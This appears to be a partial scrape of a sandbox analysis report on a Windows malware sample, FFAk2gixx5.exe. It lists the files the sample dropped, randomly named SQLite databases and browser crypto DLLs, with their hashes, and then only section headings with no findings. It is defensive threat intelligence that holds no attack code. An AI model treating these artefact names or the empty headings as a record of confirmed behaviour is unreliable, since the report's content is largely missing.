C:\ProgramData\CGDGHCBGDHJJKECAECBA	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\DBFIDGII	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8	271D5F995996735B01672CF227C81C17	7AEAACD66A59314D1CBF4016038D3A0A956BAF33	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
C:\ProgramData\FCGIJKJJKEBGHJKFIDGCAAFCAF	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\GHJJDGHCBGDHIECBGIDAEHCGDG	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6	933D6D14518371B212F36C3835794D75	92D056D912B3C0260D379330D3CC0359B57A322B	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
C:\ProgramData\JECBGCFHCFIDHIDHDGDG	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2	378391FDB591852E472D99DC4BF837DA	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
C:\ProgramData\JEHIJDGI	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	37B1FC046E4B29468721F797A2BB968D	50055EF1C50E4C1A7CCF7D00620E95128E4C448B	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	7D191EE364B1851D2E42F34E609B9C20	8D2396AF483E19522D500984908F854D61A04A44	724F186341F020B14781246C5CEB26962C18D322F4C96439EFA7BBE28D151DE7
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	ABE1198FEA554BA7456D12709E9C788D	1DE434DCFA780C88A75EC3502A9CE6363D05943B	1776DF92E6C198A7360F1EB13ECAD1630DFA0655CB9E52C086EFB9503277C9F6
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	7D191EE364B1851D2E42F34E609B9C20	8D2396AF483E19522D500984908F854D61A04A44	724F186341F020B14781246C5CEB26962C18D322F4C96439EFA7BBE28D151DE7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	ABE1198FEA554BA7456D12709E9C788D	1DE434DCFA780C88A75EC3502A9CE6363D05943B	1776DF92E6C198A7360F1EB13ECAD1630DFA0655CB9E52C086EFB9503277C9F6

Windows Analysis Report FFAk2gixx5.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
FFAk2gixx5.exe

Malware Threat Intel
Provided by